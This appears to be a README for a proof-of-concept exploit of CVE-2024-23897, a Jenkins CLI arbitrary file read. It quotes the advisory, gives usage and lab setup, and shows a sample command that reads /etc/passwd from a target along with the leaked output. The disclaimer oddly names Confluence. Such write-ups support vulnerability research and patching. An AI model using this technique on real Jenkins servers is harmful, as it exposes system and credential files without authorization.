This repository presents a proof-of-concept of CVE-2024-23897 (Discovered by sonarsource)
This code is a proof of concept of the vulnerability, I'm not pushing anyone to use it on confluence instances they don't own.
This tool has been developed for research and educational purposes only and I will not be held responsible for any use you may make of it.
According to Jenkins Security Advisory 2024-01-24 : Jenkins uses the args4j library to parse command arguments and options on the Jenkins controller when processing CLI commands. This command parser has a feature that replaces an @ character followed by a file path in an argument with the file’s contents (expandAtFiles). This feature is enabled by default and Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable it. This allows attackers to read arbitrary files on the Jenkins controller file system using the default character encoding of the Jenkins controller process.
- Attackers with Overall/Read permission can read entire files.
- Attackers without Overall/Read permission can read the first few lines of files.
$ python3 CVE-2024-23897.py -h
usage: CVE-2024-23897.py [-h] -u URL -f FILENAME
This is a POC for CVE-2024-23897 (Jenkins file read)
options:
-h, --help show this help message and exit
-u URL Url
-f FILENAME Filename
docker pull jenkins/jenkins:2.440-jdk17
docker run -p 8080:8080 jenkins/jenkins:2.440-jdk17
$ python3 CVE-2024-23897.py -u http://127.0.0.1:8080 -f '/etc/passwd'
[+] Trying to recover /etc/passwd
[+] Data recovered:
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)